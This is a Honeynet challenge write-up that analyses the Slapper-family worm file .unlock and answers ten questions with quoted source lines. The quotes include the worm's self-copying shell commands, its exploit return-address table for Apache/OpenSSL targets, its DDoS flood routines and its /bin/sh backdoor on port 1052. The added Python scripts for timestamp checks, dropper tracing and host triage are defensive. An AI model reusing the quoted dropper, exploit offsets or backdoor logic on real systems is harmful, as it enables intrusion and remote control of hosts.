Asby and N|ghtHawk of Mostly Harmless
The Challenge:
Members from the Honeynet.BR team have captured a new worm from the wild. The file (.unlock)
was used by the worm to infect the honeypot. Your mission is to analyze the captured file in
order to answer the questions below. Be sure you review the submission rules at the SotM
challenge page before submitting your results.
Questions
1. Which is the type of the .unlock file? When was it generated?
2. Based on the source code, who is the author of this worm? When was it created? Is it compatible with the date from question 1?
3. Which process name is used by the worm when it is running?
4. In which format does the worm copy itself to the new infected machine? Which files are created in the whole process? After the worm executes itself,
which files remain on the infected machine?
5. Which port is scanned by the worm?
6. Which vulnerability the worm tries to exploit? In which architectures?
7. What kind of information is sent by the worm by email? To which account?
8. Which port (and protocol) is used by the worm to communicate to other infected machines?
9. Name 3 functionalities built in the worm to attack other networks.
10. What is the purpose of the .update.c program? Which port does it use?
Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?
Question 1: Which is the type of the .unlock file? When was it generated?
A. Which is the type of the .unlock file?
- gzip compressed data
B. When was it generated?
- Fri Sep 20 12:59:04 2002. This is the MTIME field of the gzip header, which stores the modification time of the file that was compressed (the tar archive) as epoch seconds; file(1) prints it in the local timezone of the analysis machine.
hawkeye@gw:~/scan$ file .unlock
.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 12:59:04 2002, os: Unix
Question 2: Based on the source code, who is the author of this worm? When was it created? Is it compatible with the date from question 1?
A. Based on the source code, who is the author of this worm?
- contem (contem@efnet)
- modified by aion (aion@ukr.net)
hawkeye@gw:~/scan$ head -4 .unlock.c |tail -2
* Peer-to-peer UDP Distributed Denial of Service (PUD) *
* by contem@efnet *
hawkeye@gw:~/scan$ head -38 .unlock.c |tail -1
* some modification done by aion (aion@ukr.net) *
B. When was it created?
- Sep 20 15:28. This is the mtime stored for .unlock.c inside the archive; tar restores it on extraction, so it is not the time the file was unpacked here.
hawkeye@gw:~/scan$ ls -la |grep .unlock.c
-rw-r--r-- 1 hawkeye hawkeye 70981 Sep 20 15:28 .unlock.c
C. Is it compatible with the date from question 1?
- No, the .unlock.c is from a later date than the .unlock file:
.unlock: Fri Sep 20 12:59:04 2002
.unlock.c: Sep 20 15:28
Both values are epoch timestamps rendered in the same local timezone, and the gzip header records the mtime of the archive it compresses, so an archive that claims to be two and a half hours older than a file it contains points to a clock or timezone difference between the machine that last saved the source and the one that built the archive. Neither timestamp on its own is a reliable creation time for the worm.
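The comparison above can be made in one pass from the sample itself, and it is worth doing on every such archive, since file(1) shows only the gzip header time while ls after extraction shows the tar entry times. The following Python script is an added example written for this write-up, not code from the worm or from the Honeynet challenge: it parses the gzip header MTIME field directly (RFC 1952, bytes 4 to 7, little-endian), reads the member mtimes with the standard tarfile module, and reports any member that postdates its container. The tar.gz it runs on is constructed inside the script (placeholder contents, the two times from questions 1 and 2 taken as UTC) and is not the real .unlock.

```python
"""Check a gzipped tarball for members whose recorded mtime is later than the
gzip header's MTIME.  Added example for this write-up; the archive built below
is constructed, not the real .unlock."""
import datetime
import gzip
import io
import struct
import tarfile

UTC = datetime.timezone.utc


def gzip_header_mtime(data: bytes) -> int:
    """Return the MTIME field of the first gzip member header (RFC 1952).
    Layout: ID1 ID2 CM FLG MTIME[4, little-endian] XFL OS."""
    if len(data) < 10 or data[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream")
    (mtime,) = struct.unpack("<I", data[4:8])
    return mtime


def tar_member_mtimes(data: bytes) -> dict:
    """Map each entry name in the compressed tarball to the mtime stored for it.
    These are the values tar restores on extraction, i.e. what ls showed above."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
        return {m.name: int(m.mtime) for m in tf.getmembers()}


def members_newer_than_header(data: bytes) -> list:
    """Names of members that postdate the gzip header time.  A non-empty result
    is the situation in question 2: the container claims to predate its contents."""
    header = gzip_header_mtime(data)
    return [name for name, mt in tar_member_mtimes(data).items() if mt > header]


def build_sample(header_time: int, members: dict) -> bytes:
    """Constructed input: a tar.gz with a chosen gzip MTIME and member mtimes."""
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w") as tf:
        for name, (mtime, content) in members.items():
            info = tarfile.TarInfo(name)
            info.size, info.mtime = len(content), mtime
            tf.addfile(info, io.BytesIO(content))
    out = io.BytesIO()
    with gzip.GzipFile(fileobj=out, mode="wb", mtime=header_time) as gz:
        gz.write(tar_buf.getvalue())
    return out.getvalue()


def fmt(ts: int) -> str:
    return datetime.datetime.fromtimestamp(ts, UTC).strftime("%a %b %d %H:%M:%S %Y UTC")


# Constructed sample using the two times from questions 1 and 2, taken as UTC.
HEADER_TIME = int(datetime.datetime(2002, 9, 20, 12, 59, 4, tzinfo=UTC).timestamp())
MEMBER_TIME = int(datetime.datetime(2002, 9, 20, 15, 28, 0, tzinfo=UTC).timestamp())
SAMPLE = build_sample(HEADER_TIME, {
    ".unlock.c": (MEMBER_TIME, b"/* constructed placeholder, not the worm source */\n"),
    ".update.c": (HEADER_TIME - 60, b"/* constructed placeholder */\n"),
})

if __name__ == "__main__":
    print("gzip header MTIME :", fmt(gzip_header_mtime(SAMPLE)))
    for name, mt in tar_member_mtimes(SAMPLE).items():
        print(f"{name:12} mtime : {fmt(mt)}")
    print("members newer than the archive header:", members_newer_than_header(SAMPLE))
```

To run it against a real sample, replace SAMPLE with the bytes of the archive (open(".unlock", "rb").read()); the header check and the member listing need nothing else.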
Question 3: Which process name is used by the worm when it is running?
- "httpd " (note the trailing space inside the quotes; it is part of the name the worm gives itself while running, and it is what tells the worm apart from a real Apache httpd in a process listing)
hawkeye@gw:~/scan$ head -78 .unlock.c |tail -1
#define PSNAME "httpd "
Question 4: In which format does the worm copy itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?
A. In which format does the worm copy itself to the new infected machine?
- uuencoded
hawkeye@gw:~/scan$ head -1416 .unlock.c |tail -1
writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
hawkeye@gw:~/scan$ head -1421 .unlock.c|tail -1
writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
B. Which files are created in the whole process?
- /tmp/.unlock.uu
- /tmp/.unlock
- /tmp/.unlock.c
- /tmp/.update.c
- /tmp/httpd
- /tmp/update
The last two are compiled on the victim from the two sources, so the worm can only complete an infection on a host that has gcc and the OpenSSL library it links with (-lcrypto) installed.
hawkeye@gw:~/scan$ head -1424 .unlock.c |tail -4
writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
"tar xzf /tmp/.unlock -C /tmp/; "
"gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; "
"gcc -o /tmp/update /tmp/.update.c;\n");
C. After the worm executes itself, which files remain on the infected machine?
- /tmp/.unlock (the gzip tarball itself, which is what the worm sends on to its next victim)
- The running /tmp/httpd and /tmp/update processes survive the rm -rf below even though their binaries are unlinked; on Linux the executable image can still be copied out through /proc/<pid>/exe until the process exits.
hawkeye@gw:~/scan$ head -1428 .unlock.c |tail -4
sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip);
sleep(3); writem(sockfd,rcv);
writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
" /tmp/httpd /tmp/update; exit; \n");
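The lists of created and remaining files above were read off the dropper commands by hand. As an added example (not part of the original submission and not code from the worm), the Python below reconstructs the same bookkeeping from the command text: it skips the here-document body, splits the remaining commands, records what `cat >`, `uudecode -o`, `tar xzf ... -C` and `gcc -o` create and what `rm -rf` deletes, and reports what survives and what was executed. The dropper text embedded in it is constructed from the fragments quoted above (with a placeholder uuencoded body and a documentation IP in place of the local IP the worm substitutes), and the manifest for /tmp/.unlock, assumed here to contain .unlock.c and .update.c as the tar and gcc lines imply, is supplied by hand because the script never sees inside the archive.

```python
"""Reconstruct created, removed and surviving files from a shell dropper.
Added example for this write-up; the dropper text is constructed from the
fragments quoted in question 4 and is not a capture of the live worm."""
import posixpath
import re
import shlex

# Constructed: the heredoc body is a placeholder, 192.0.2.1 is a documentation address.
DROPPER = """cat > /tmp/.unlock.uu << __eof__;
begin 644 .unlock
M'XL(placeholder-uuencoded-body-not-real
`
end
__eof__
uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -C /tmp/; gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o /tmp/update /tmp/.update.c;
/tmp/httpd 192.0.2.1; /tmp/update;
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update; exit;
"""

# Assumed contents of the archive, taken from the tar and gcc lines; the script
# cannot look inside an archive it never receives.
ARCHIVE_MANIFEST = {"/tmp/.unlock": [".unlock.c", ".update.c"]}


def command_lines(script: str) -> list:
    """Return the script's command lines with here-document bodies removed."""
    lines, terminator = [], None
    for line in script.splitlines():
        if terminator is not None:          # inside a heredoc: skip until its terminator
            if line.strip() == terminator:
                terminator = None
            continue
        m = re.search(r"<<\s*(\w+)", line)
        if m:
            terminator = m.group(1)
        lines.append(line)
    return lines


def trace_dropper(script: str, manifest: dict) -> dict:
    """Walk the commands and record file creation, deletion and execution."""
    created, removed, executed = [], [], []
    for line in command_lines(script):
        for cmd in line.split(";"):
            argv = shlex.split(cmd)
            if not argv:
                continue
            prog = argv[0]
            if ">" in argv:                                   # shell redirect creates its target
                created.append(argv[argv.index(">") + 1])
            elif prog in ("uudecode", "gcc") and "-o" in argv:
                created.append(argv[argv.index("-o") + 1])
            elif prog == "tar":                               # tar xzf ARCHIVE -C DEST
                archive = argv[2]
                dest = argv[argv.index("-C") + 1] if "-C" in argv else "."
                created += [posixpath.join(dest, m) for m in manifest.get(archive, [])]
            elif prog == "rm":
                removed += [a for a in argv[1:] if not a.startswith("-")]
            elif prog.startswith("/"):                        # absolute path: a dropped binary is run
                executed.append(prog)
    remaining = [p for p in created if p not in removed]
    return {"created": created, "removed": removed, "executed": executed, "remaining": remaining}


if __name__ == "__main__":
    for key, paths in trace_dropper(DROPPER, ARCHIVE_MANIFEST).items():
        print(f"{key:9}: {' '.join(paths)}")
```

The same walk works on any dropper captured from a honeypot session once its archive manifest is known; the "executed" list is the set of binaries to look for in the process table, and "remaining" is what a disk search will still find.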
Question 5: Which port is scanned by the worm?
- 80
hawkeye@gw:~/scan$ head -67 .unlock.c |tail -1
#define SCANPORT 80
Question 6: Which vulnerability the worm tries to exploit? In which architectures?
A. Which vulnerability the worm tries to exploit?
- OpenSSL. The worm links against OpenSSL (the -lcrypto in the gcc line of question 4 and the headers below) to drive the SSL handshake in which the flaw lies: the buffer overflow in OpenSSL's SSLv2 handshake exploited by the Slapper family (CVE-2002-0656), reached through Apache's mod_ssl.
hawkeye@gw:~/scan$ head -1141 .unlock.c |tail -4
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
B. In which architectures?
- The worm's table of return addresses is keyed by Linux distribution and Apache version rather than CPU type (all entries are in the 0x08xxxxxx range of 32-bit x86 Linux binaries), and several versions appear twice with different addresses, one per known build. The targets are:
- Gentoo
- Debian (1.3.26)
- Red-Hat (1.3.6,1.3.9,1.3.12,1.3.19,1.3.20,1.3.22,1.3.23,1.3.26)
- Suse (1.3.12,1.3.17,1.3.19,1.3.20,1.3.23)
- Mandrake (1.3.14,1.3.19,1.3.20,1.3.23)
- Slackware (1.3.26)
hawkeye@gw:~/scan$ head -1269 .unlock.c |tail -25
} architectures[] = {
{"Gentoo", "", 0x08086c34},
{"Debian", "1.3.26", 0x080863cc},
{"Red-Hat", "1.3.6", 0x080707ec},
{"Red-Hat", "1.3.9", 0x0808ccc4},
{"Red-Hat", "1.3.12", 0x0808f614},
{"Red-Hat", "1.3.12", 0x0809251c},
{"Red-Hat", "1.3.19", 0x0809af8c},
{"Red-Hat", "1.3.20", 0x080994d4},
{"Red-Hat", "1.3.26", 0x08161c14},
{"Red-Hat", "1.3.23", 0x0808528c},
{"Red-Hat", "1.3.22", 0x0808400c},
{"SuSE", "1.3.12", 0x0809f54c},
{"SuSE", "1.3.17", 0x08099984},
{"SuSE", "1.3.19", 0x08099ec8},
{"SuSE", "1.3.20", 0x08099da8},
{"SuSE", "1.3.23", 0x08086168},
{"SuSE", "1.3.23", 0x080861c8},
{"Mandrake", "1.3.14", 0x0809d6c4},
{"Mandrake", "1.3.19", 0x0809ea98},
{"Mandrake", "1.3.20", 0x0809e97c},
{"Mandrake", "1.3.23", 0x08086580},
{"Slackware", "1.3.26", 0x083d37fc},
{"Slackware", "1.3.26",0x080b2100}
};
Question 7: What kind of information is sent by the worm by email? To which account?
A. What kind of information is sent by the worm by email?
- hostid
- hostname
- the IP address the attack came from (labelled att_from, taken from the variable sip)
hawkeye@gw:~/scan$ head -124 .unlock.c |tail -3
sprintf(cmdbuf," hostid: %d \r\n"
" hostname: %s \r\n"
" att_from: %s \r\n",gethostid(),buffer,sip);
B. To which account?
- aion@ukr.net
hawkeye@gw:~/scan$ head -77 .unlock.c |tail -1
#define MAILTO "aion@ukr.net"
Question 8: Which port (and protocol) is used by the worm to communicate to other infected machines?
- Port : 4156
- Protocol : UDP
hawkeye@gw:~/scan$ head -66 .unlock.c |tail -1
#define PORT 4156
hawkeye@gw:~/scan$ head -3 .unlock.c |tail -1
* Peer-to-peer UDP Distributed Denial of Service (PUD) *
Question 9: Name 3 functionalities built in the worm to attack other networks.
- UDP flood
- TCP flood (IPv4 and IPv6)
- DNS flood
hawkeye@gw:~/scan$ head -2205 .unlock.c |tail -1
case 0x29: { // Udp flood
hawkeye@gw:~/scan$ head -2246 .unlock.c |tail -1
case 0x2A: { // Tcp flood
hawkeye@gw:~/scan$ head -2279 .unlock.c |tail -1
case 0x2B: { // IPv6 Tcp flood
hawkeye@gw:~/scan$ head -2308 .unlock.c |tail -1
case 0x2C: { // Dns flood
Question 10: What is the purpose of the .update.c program? Which port does it use?
A. What is the purpose of the .update.c program?
- .update.c is a small password-protected backdoor. It listens on the port below and compares what it receives with the compiled-in password (PASS); on a match it replaces itself with an interactive /bin/sh via execl, so the connecting party gets a shell, and otherwise the shown lines close its descriptors and exit. Since the program does not persist past a session, it is best understood as a way for the author to get back onto the machine and install another or updated backdoor.
hawkeye@gw:~/scan$ head -66 .update.c|tail -4
if( !strncmp(temp_buff,PASS,strlen(PASS)) )
execl("/bin/sh","sh -i",(char *)0);
closeall();
exit(0);
B. Which port does it use?
- 1052
hawkeye@gw:~/scan$ head -4 .update.c|tail -1
#define PORT 1052
Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?
- SLEEPTIME makes the program sleep for 5 minutes (300 seconds) between listening periods, and UPTIME limits each listening period to 10 seconds. The backdoor is therefore reachable for only about 10 seconds in every 310 (roughly 3% of the time), so a single port scan or connection attempt will almost always find port 1052 closed; confirming it means polling repeatedly over several minutes, or looking for the process rather than the open port.
hawkeye@gw:~/scan$ head -7 .update.c|tail -2
#define SLEEPTIME 300 // sleep 5 min.
#define UPTIME 10 // listen 10 sec.
hawkeye@gw:~/scan$ head -52 .update.c|tail -1
for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
hawkeye@gw:~/scan$ head -73 .update.c|tail -1
sleep(SLEEPTIME);
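Taken together, questions 3, 4, 8 and 10 give a host-level signature for this worm: a process name (argv[0]) of exactly "httpd " with the trailing space, a UDP socket bound to 4156, an intermittent TCP listener on 1052, /tmp/.unlock left on disk, and the compiled /tmp/httpd and /tmp/update running from unlinked files. The Python below is an added triage example written for this page, not code from the submission or from the worm. It evaluates those indicators from /proc-shaped evidence (cmdline bytes, exe link targets, the hex-port tables of /proc/net/tcp and /proc/net/udp) so that the same logic runs on a live Linux host or on collected copies; the evidence embedded in it is constructed, and the PIDs, inode numbers and the legitimate Apache command line are made up for illustration.

```python
"""Host triage for the indicators extracted in this analysis.  Added example
for this write-up; the sample evidence below is constructed, not captured."""
import os
from dataclasses import dataclass, field

WORM_PSNAME = "httpd "       # #define PSNAME "httpd " in .unlock.c, trailing space included
P2P_UDP_PORT = 4156          # #define PORT 4156 in .unlock.c
BACKDOOR_TCP_PORT = 1052     # #define PORT 1052 in .update.c
RESIDUAL_FILES = ("/tmp/.unlock",)   # the one file the worm's rm -rf leaves behind
TCP_LISTEN = "0A"            # st column value for LISTEN in /proc/net/tcp


@dataclass
class Findings:
    worm_pids: list = field(default_factory=list)
    deleted_binaries: dict = field(default_factory=dict)   # pid -> "(deleted)" exe target
    p2p_socket: bool = False
    backdoor_listener: bool = False
    residual_files: list = field(default_factory=list)

    def infected(self) -> bool:
        # A "httpd " process or the P2P socket is conclusive on its own.  The backdoor
        # port is only open 10 s in every ~310 s, so its absence proves nothing.
        return bool(self.worm_pids) or self.p2p_socket


def bound_ports(proc_net_table: str) -> dict:
    """Parse /proc/net/{tcp,udp} text into {local_port: state}; ports are hex in the file."""
    ports = {}
    for line in proc_net_table.splitlines()[1:]:          # first row is the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        port_hex = fields[1].rsplit(":", 1)[1]
        ports[int(port_hex, 16)] = fields[3]
    return ports


def triage(cmdlines: dict, exe_links: dict, proc_net_tcp: str, proc_net_udp: str, present_paths) -> Findings:
    """cmdlines: pid -> raw /proc/<pid>/cmdline bytes; exe_links: pid -> readlink of /proc/<pid>/exe."""
    f = Findings()
    for pid, cmdline in cmdlines.items():
        argv0 = cmdline.split(b"\0", 1)[0].decode("latin-1")
        if argv0 == WORM_PSNAME:   # exact match keeps the trailing space significant
            f.worm_pids.append(pid)
            # The worm deletes its compiled binaries while they run; the exe link still resolves.
            target = exe_links.get(pid, "")
            if target.endswith("(deleted)"):
                f.deleted_binaries[pid] = target
    f.p2p_socket = P2P_UDP_PORT in bound_ports(proc_net_udp)
    f.backdoor_listener = bound_ports(proc_net_tcp).get(BACKDOOR_TCP_PORT) == TCP_LISTEN
    f.residual_files = [p for p in RESIDUAL_FILES if p in present_paths]
    return f


def collect_live() -> Findings:
    """Gather the same evidence from the running host's /proc (Linux only, best as root)."""
    cmdlines, exe_links = {}, {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdlines[int(pid)] = fh.read()
            exe_links[int(pid)] = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue          # process exited, or not ours to inspect
    with open("/proc/net/tcp") as t, open("/proc/net/udp") as u:
        tcp, udp = t.read(), u.read()
    return triage(cmdlines, exe_links, tcp, udp, {p for p in RESIDUAL_FILES if os.path.exists(p)})


# Constructed evidence shaped like /proc output (PIDs, inodes and the Apache command line are invented).
SAMPLE_CMDLINES = {
    612: b"/usr/sbin/httpd\0-DHAVE_ACCESS\0",   # legitimate Apache: no trailing space
    4471: b"httpd \0",                           # worm: argv[0] == PSNAME
}
SAMPLE_EXE_LINKS = {612: "/usr/sbin/httpd", 4471: "/tmp/httpd (deleted)"}
SAMPLE_UDP = ("  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
              "   0: 00000000:103C 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 18802 2\n")
SAMPLE_TCP = ("  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
              "   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11043 1\n"
              "   1: 00000000:041C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18910 1\n")
SAMPLE_PATHS = {"/tmp/.unlock"}


def run_sample() -> Findings:
    return triage(SAMPLE_CMDLINES, SAMPLE_EXE_LINKS, SAMPLE_TCP, SAMPLE_UDP, SAMPLE_PATHS)


if __name__ == "__main__":
    result = run_sample()
    print(result)
    print("infected:", result.infected())
```

0x103C and 0x041C are 4156 and 1052 in the hex form /proc/net uses. On a live host call collect_live() instead of run_sample(); because of the UPTIME/SLEEPTIME cycle, treat backdoor_listener as confirmation when it is True and as no information when it is False.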
Conclusion
The .unlock file seems to be the Linux.Worm.Slapper.C.
Asby and N|ghtHawk
Mostly Harmless